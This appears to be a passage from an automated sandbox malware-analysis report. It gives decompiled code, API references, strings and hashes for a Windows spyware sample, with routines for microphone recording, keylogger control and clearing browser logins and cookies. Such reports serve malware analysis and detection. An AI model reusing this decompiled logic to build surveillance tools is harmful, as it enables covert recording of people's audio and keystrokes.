				E00404AA4(_t36, 0x46c780, _t50, _t73);
				if( *0x46baf8 != 0) {
					E00410BB0(0x46c518, L00401F95(0x46c518), "FR", 1);
				}
				 *0x46baf9 = 0;
				return 0;
			}

0x0040a523
0x0040a526
0x0040a531
0x0040a538
0x0040a544
0x0040a548
0x0040a54a
0x0040a550
0x0040a550
0x0040a554
0x0040a554
0x0040a554
0x0040a554
0x0040a556
0x0040a558
0x0040a55d
0x0040a55d
0x0040a55f
0x0040a561
0x0040a568
0x0040a568
0x0040a56e
0x0040a570
0x0040a577
0x0040a577
0x0040a57f
0x0040a581
0x0040a588
0x0040a588
0x0040a58c
0x0040a590
0x0040a592
0x0040a599
0x0040a59b
0x0040a59b
0x0040a5a1
0x0040a5bb
0x0040a5c0
0x0040a5c6
0x0040a5ca
0x0040a5ce
0x0040a5a7
0x0040a5a7
0x0040a5ad
0x00000000
0x0040a5b3
0x0040a5b3
0x0040a5b9
0x00000000
0x00000000
0x0040a5b9
0x0040a5ad
0x0040a5d4
0x00000000
0x00000000
0x0040a5d6
0x0040a5ee
0x0040a5ee
0x0040a5f6
0x0040a600
0x0040a605
0x0040a611
0x0040a616
0x0040a620
0x0040a625
0x0040a634
0x0040a639
0x0040a643
0x0040a64f
0x0040a664
0x0040a66a
0x0040a66b
0x0040a678

APIs

Sleep.KERNEL32 ref: 0040A538
Sleep.KERNEL32(00001388), ref: 0040A5C0

Strings

Cleared browsers logins and cookies., xrefs: 0040A60C
[Info], xrefs: 0040A61B
[Cleared browsers logins and cookies.], xrefs: 0040A5FB

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[Info]
API String ID: 3472027048-899236412
Opcode ID: f19a15edf60fda488c37348f0fc0db5a19c500daee504fa477397d3b1e9aa14c
Instruction ID: 6d279061f464f32cb3b26c385cb9bb5b4933cac79da48b767b21b0c9aa47c76d
Opcode Fuzzy Hash: f19a15edf60fda488c37348f0fc0db5a19c500daee504fa477397d3b1e9aa14c
Instruction Fuzzy Hash: 8B31B0002483817ECA1167B518267EB6B921E53348F09447FF8D42B3D3DABA482C93AF

Uniqueness

Uniqueness Score: -1.00%

Function 00401BCD, Relevance: 7.6, APIs: 5, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401BCD(void* __eflags) {
				signed short _t3;
				signed int _t7;
				signed int _t15;
				signed int _t24;
				signed int _t25;
				intOrPtr* _t33;
				void* _t34;

				_t34 = __eflags;
				CreateDirectoryW(L00401EEB(0x46c0e0), 0);
				_t3 = 8;
				 *0x46baa6 = _t3;
				 *0x46ba9c = 0x1f40;
				 *0x46baa0 = 0x1f40;
				0x46ba98->wFormatTag = 1;
				 *0x46ba9a = 1;
				 *0x46baa4 = 1;
				 *0x46baa8 = 0;
				_t7 = E00436769(_t5, L00401F95(L00401E49(0x46c578, 1, _t34, 0x24)));
				_t24 =  *0x46ba9c; // 0x0
				 *_t33 = 0x30008;
				_t25 = _t24 * _t7 * 0x3c;
				 *0x46baac = _t25;
				 *0x46bab4 = (( *0x46baa6 & 0x0000ffff) >> 3) * _t25;
				waveInOpen(0x46bab0, 0xffffffff, 0x46ba98, 0x401cef, 0, ??);
				L00401F84( *0x46bab4);
				0x46ba78->lpData = L00401F95(0x46c0f8);
				_t15 =  *0x46bab4; // 0x0
				 *0x46ba7c = _t15;
				 *0x46ba80 = 0;
				 *0x46ba84 = 0;
				 *0x46ba88 = 0;
				 *0x46ba8c = 0;
				waveInPrepareHeader( *0x46bab0, 0x46ba78, 0x20);
				waveInAddBuffer( *0x46bab0, 0x46ba78, 0x20);
				waveInStart( *0x46bab0);
				return 0;
			}

0x00401bcd
0x00401bdd
0x00401be5
0x00401beb
0x00401bf3
0x00401bfa
0x00401c02
0x00401c10
0x00401c17
0x00401c1e
0x00401c31
0x00401c36
0x00401c3f
0x00401c51
0x00401c68
0x00401c6e
0x00401c73
0x00401c86
0x00401c99
0x00401c9e
0x00401caa
0x00401caf
0x00401cb5
0x00401cbb
0x00401cc1
0x00401cc7
0x00401cd6
0x00401ce2
0x00401cec

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BDD
waveInOpen.WINMM(0046BAB0,000000FF,0046BA98,Function_00001CEF,00000000,00000000,00000024), ref: 00401C73
waveInPrepareHeader.WINMM(0046BA78,00000020), ref: 00401CC7
waveInAddBuffer.WINMM(0046BA78,00000020), ref: 00401CD6
waveInStart.WINMM ref: 00401CE2

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID:
API String ID: 1356121797-0
Opcode ID: 57c034572b2ed406b040fceb85c2c84b668c055f7913579716275a8f10a8750c
Instruction ID: 2b1c6c3e797ec0a8f4e77f87a8aae8cb50084cbbd1b388b0679906e1f0d720f4
Opcode Fuzzy Hash: 57c034572b2ed406b040fceb85c2c84b668c055f7913579716275a8f10a8750c
Instruction Fuzzy Hash: 4F218E316143019BC714AFE6EC4592A7BA5EB44315700403FF505D6AB1FBB844809B9E

Uniqueness

Uniqueness Score: -1.00%

Function 004475DA, Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004475DA() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E004475A3(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E0043F98C(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E004401F5(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}

0x004475e9
0x004475ef
0x00447647
0x00447647
0x004475f1
0x004475f2
0x004475f7
0x00447600
0x00447606
0x0044760c
0x00447611
0x00000000
0x00447613
0x00447619
0x0044761e
0x0044763c
0x00447636
0x00447636
0x00447638
0x00447638
0x0044763f
0x00447644
0x00447611
0x0044764b
0x0044764e
0x0044764e
0x0044765c

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004475E3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00447606

Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044762C
_free.LIBCMT ref: 0044763F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044764E

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 61f8f7cb896a7504797b3450bd01ab7c94cee95149b620def5b5096d384d928a
Instruction ID: f196bec27739b8aa23800adfafa3dc4af21a9600f240203cb0157e91f0545353
Opcode Fuzzy Hash: 61f8f7cb896a7504797b3450bd01ab7c94cee95149b620def5b5096d384d928a
Instruction Fuzzy Hash: D701B1B2605B117B77211ABA5C88C7B6A6EDAC6BB6716012AB904C3241DF698D0381BC

Uniqueness

Uniqueness Score: -1.00%

Function 0043D8BC, Relevance: 7.5, APIs: 5, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0043D8BC(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x46a9a0; // 0x31f8820
					if(_t7 != 0x46a780) {
						E004401F5(_t7);
						 *0x46a9a0 = 0x46a780;
					}
				}
				E004401F5( *0x46ba08);
				 *0x46ba08 = 0;
				E004401F5( *0x46ba0c);
				 *0x46ba0c = 0;
				E004401F5( *0x46ba34);
				 *0x46ba34 = 0;
				E004401F5( *0x46ba38);
				 *0x46ba38 = 0;
				return 1;
			}

0x0043d8c5
0x0043d8c9
0x0043d8cb
0x0043d8d7
0x0043d8da
0x0043d8e0
0x0043d8e0
0x0043d8d7
0x0043d8ec
0x0043d8f9
0x0043d8ff
0x0043d90a
0x0043d910
0x0043d91b
0x0043d921
0x0043d929
0x0043d932

APIs

_free.LIBCMT ref: 0043D8DA

Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D

_free.LIBCMT ref: 0043D8EC
_free.LIBCMT ref: 0043D8FF
_free.LIBCMT ref: 0043D910
_free.LIBCMT ref: 0043D921

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a7a9538d0cb85230f9e5fc11bbdddd4393d5212c982b8a8952a49a39c05a4c0d
Instruction ID: 5add5f9177ea0066f46c3e8b3c16d1701801f70c1477332ad76d85b4da6d78c6
Opcode Fuzzy Hash: a7a9538d0cb85230f9e5fc11bbdddd4393d5212c982b8a8952a49a39c05a4c0d
Instruction Fuzzy Hash: 08F0FEB1842A209BD7117F95BC424053B60E704728711053BF611E6771FBBA08A1DFDF

Uniqueness

Uniqueness Score: -1.00%

Function 00446969, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00446969(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = L0043CF23(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E0044D309(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E0043698A();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = E0043F348(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E0044D309(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = L00446D38(_a12, __eflags, _t213);
													E004401F5(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E0044D309(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E0043698A();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0x46a00c; // 0x1e1e4200
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = E0044F5C0(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														L00431F00(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																L0043AF20(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E00446951);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return L0042FD1B(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							E004401F5(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = E0044F580( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						L00446D13( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = E0043A504();
					_t219 = 0x16;
					 *_t148 = _t219;
					E0043695D();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}

0x0044696e
0x00446971
0x00446977
0x0044698f
0x00446992
0x00446996
0x00446998
0x0044699a
0x0044699c
0x0044699f
0x004469a2
0x004469a5
0x004469a7
0x004469ff
0x004469ff
0x00446a05
0x00446a07
0x00446a12
0x00446a16
0x00446a18
0x00446a1b
0x00446a1f
0x00446a1f
0x00446a21
0x00446a23
0x00446a25
0x00446a27
0x00446a27
0x00446a29
0x00446a2c
0x00446a2f
0x00446a2f
0x00446a31
0x00446a32
0x00446a32
0x00446a3d
0x00446a3f
0x00446a42
0x00446a43
0x00446a46
0x00446a46
0x00446a4a
0x00446a4d
0x00446a50
0x00446a50
0x00446a5e
0x00446a60
0x00446a63
0x00446a65
0x00446a6f
0x00446a72
0x00446a75
0x00446a77
0x00446a7a
0x00446a7c
0x00446acc
0x00446acf
0x00446acf
0x00446ad1
0x00000000
0x00446a7e
0x00446a80
0x00446a80
0x00446a82
0x00446a85
0x00446a85
0x00446a8a
0x00446a8d
0x00446a8d
0x00446a8f
0x00446a90
0x00446a90
0x00446a94
0x00446a97
0x00446a97
0x00446a9a
0x00446a9d
0x00446aaa
0x00446aaf
0x00446ab2
0x00446ab4
0x00446aee
0x00446aef
0x00446af0
0x00446af1
0x00446af2
0x00446af3
0x00446af8
0x00446afc
0x00446afe
0x00446aff
0x00446b02
0x00446b02
0x00446b05
0x00446b05
0x00446b07
0x00446b08
0x00446b08
0x00446b11
0x00446b12
0x00446b15
0x00446b18
0x00446b1b
0x00446b1d
0x00446b24
0x00446b26
0x00446b29
0x00446b33
0x00446b36
0x00446b37
0x00446b39
0x00446b4d
0x00446b4d
0x00446b50
0x00446b5a
0x00446b5f
0x00446b62
0x00446b64
0x00000000
0x00446b66
0x00446b6a
0x00446b73
0x00446b79
0x00000000
0x00446b7c
0x00446b3b
0x00446b3b
0x00446b41
0x00446b46
0x00446b49
0x00446b4b
0x00446b82
0x00446b84
0x00446b85
0x00446b86
0x00446b87
0x00446b88
0x00446b89
0x00446b8e
0x00446b91
0x00446b92
0x00446b94
0x00446b9a
0x00446ba1
0x00446ba4
0x00446ba7
0x00446ba8
0x00446bab
0x00446bac
0x00446baf
0x00446bb0
0x00446bd1
0x00446bd1
0x00446bd3
0x00000000
0x00000000
0x00446bb8
0x00446bba
0x00446bbc
0x00446bbe
0x00446bc0
0x00446bc2
0x00446bc4
0x00446bcf
0x00000000
0x00446bcf
0x00446bc4
0x00446bc0
0x00000000
0x00446bbc
0x00446bd5
0x00446bd7
0x00446bda
0x00446bf3
0x00446bf3
0x00446bf5
0x00446bf8
0x00446c08
0x00446c0a
0x00446c0a
0x00446bfa
0x00446bfa
0x00446bfd
0x00000000
0x00446bff
0x00446bff
0x00446c02
0x00000000
0x00446c04
0x00446c04
0x00446c04
0x00446c02
0x00446bfd
0x00446c18
0x00446c1c
0x00446c2a
0x00446c2f
0x00446c44
0x00446c46
0x00446c4c
0x00446c4f
0x00446c81
0x00446c81
0x00446c86
0x00446c8c
0x00446c8c
0x00446c93
0x00446cad
0x00446cad
0x00446cae
0x00446cb4
0x00446cba
0x00446cbb
0x00446cbc
0x00446cc1
0x00446cc4
0x00446cc6
0x00000000
0x00000000
0x00000000
0x00000000
0x00446c95
0x00446c95
0x00446c9b
0x00446c9d
0x00000000
0x00446c9f
0x00446c9f
0x00446ca2
0x00000000
0x00446ca4
0x00446ca4
0x00446cab
0x00000000
0x00000000
0x00000000
0x00000000
0x00446cab
0x00446ca2
0x00446c9d
0x00000000
0x00446cc8
0x00446cd0
0x00446cd6
0x00446cd8
0x00446cd8
0x00446ce0
0x00446ce5
0x00446ced
0x00446cf0
0x00446cf2
0x00446d06
0x00446d0b
0x00446c51
0x00446c51
0x00446c52
0x00446c53
0x00446c54
0x00446c55
0x00446c5d
0x00446c5d
0x00446c5d
0x00446c5f
0x00446c62
0x00446c65
0x00446c65
0x00446bdc
0x00446bdf
0x00446be1
0x00000000
0x00446be3
0x00446be3
0x00446be6
0x00446be7
0x00446be8
0x00446be9
0x00446bee
0x00446be1
0x00446c6d
0x00446c72
0x00446c7d
0x00000000
0x00000000
0x00000000
0x00446b4b
0x00446b1f
0x00446b21
0x00446b7d
0x00446b81
0x00446b81
0x00000000
0x00000000
0x00000000
0x00000000
0x00446ab6
0x00446ab9
0x00446abc
0x00446abf
0x00446ac2
0x00446ac5
0x00446ac8
0x00446ac8
0x00000000
0x00446a85
0x00446a67
0x00446a67
0x00446ad3
0x00446ad5
0x00000000
0x00446ada
0x004469a9
0x004469a9
0x004469ac
0x004469b5
0x004469b8
0x004469bf
0x004469c1
0x004469da
0x004469db
0x004469dc
0x004469de
0x004469e3
0x004469c3
0x004469c3
0x004469c6
0x004469c7
0x004469c9
0x004469cb
0x004469cd
0x004469d2
0x004469d2
0x004469e6
0x004469e8
0x004469ea
0x00000000
0x00000000
0x004469f0
0x004469f3
0x004469f5
0x004469f7
0x00000000
0x004469f9
0x004469f9
0x004469fc
0x00000000
0x004469fc
0x00000000
0x004469f7
0x00446adb
0x00446ade
0x00446ae3
0x00000000
0x00446ae6
0x00446979
0x00446979
0x00446980
0x00446981
0x00446983
0x00446988
0x00446ae7
0x00446aeb
0x00446aeb
0x00000000

APIs

_strpbrk.LIBCMT ref: 004469B8
_free.LIBCMT ref: 00446AD5

Part of subcall function 0043698A: IsProcessorFeaturePresent.KERNEL32(00000017,0043695C,00000000,00000000,?,0046C518,0040D10E,00000000,?,?,0043697C,00000000,00000000,00000000,00000000,00000000), ref: 0043698C
Part of subcall function 0043698A: GetCurrentProcess.KERNEL32(C0000417), ref: 004369AE
Part of subcall function 0043698A: TerminateProcess.KERNEL32(00000000), ref: 004369B5

Strings

*?, xrefs: 004469AC
., xrefs: 00446C8C

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 137a9f4ad955f4626591eb4d424c202b9ba50c1f2292fbc06302f1bc433b3f7a
Instruction ID: 2df9b6113c9c77aaef819b405c4b5e21061328770e73cee352be1be1b5cbe390
Opcode Fuzzy Hash: 137a9f4ad955f4626591eb4d424c202b9ba50c1f2292fbc06302f1bc433b3f7a
Instruction Fuzzy Hash: 9A51C5B1E00109AFEF14CFA9C841AAEB7B5EF4A314F25816EE454F7300E6799E018B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040951E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040951E(void* __ebx, struct HHOOK__** __ecx) {
				char _v28;
				void* __edi;
				struct HHOOK__** _t29;
				void* _t30;
				void* _t31;

				_t19 = __ebx;
				_t29 = __ecx;
				_t35 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {
					__eflags = 0;
					return 0;
				}
				_t28 = "Online Keylogger Stopped";
				E00402084(__ebx,  &_v28, "Online Keylogger Stopped");
				_t31 = _t30 - 0x18;
				E004172DA(_t31,  &_v28);
				E00409634(__ebx, _t29, _t35);
				E00401FC7();
				_t32 = _t31 - 0x18;
				E00402084(__ebx, _t31 - 0x18, "Online Keylogger Stopped");
				E00402084(_t19, _t32 - 0x18, "[Info]");
				L00416C80(_t19, _t28);
				_t29[0x12] = 0;
				CloseHandle(_t29[0xf]);
				if(_t29[0x12] == 0 &&  *_t29 != 0) {
					UnhookWindowsHookEx( *_t29);
					 *_t29 =  *_t29 & 0x00000000;
				}
				return 1;
			}

0x0040951e
0x00409525
0x00409528
0x0040952c
0x004095a1
0x00000000
0x004095a1
0x0040952e
0x00409537
0x0040953c
0x00409544
0x0040954b
0x00409553
0x00409558
0x0040955e
0x0040956d
0x00409572
0x0040957a
0x00409581
0x0040958b
0x00409594
0x0040959a
0x0040959a
0x00000000

APIs

Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

CloseHandle.KERNEL32(?), ref: 00409581
UnhookWindowsHookEx.USER32 ref: 00409594

Strings

Online Keylogger Stopped, xrefs: 0040952E, 00409536, 0040955D
[Info], xrefs: 00409568

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: LocalTime$CloseEventHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped$[Info]
API String ID: 3650414481-1913360614
Opcode ID: fa00e6ca810f7b458d358df112eb891d89e38a820840c17ff32a5804d1cb9a30
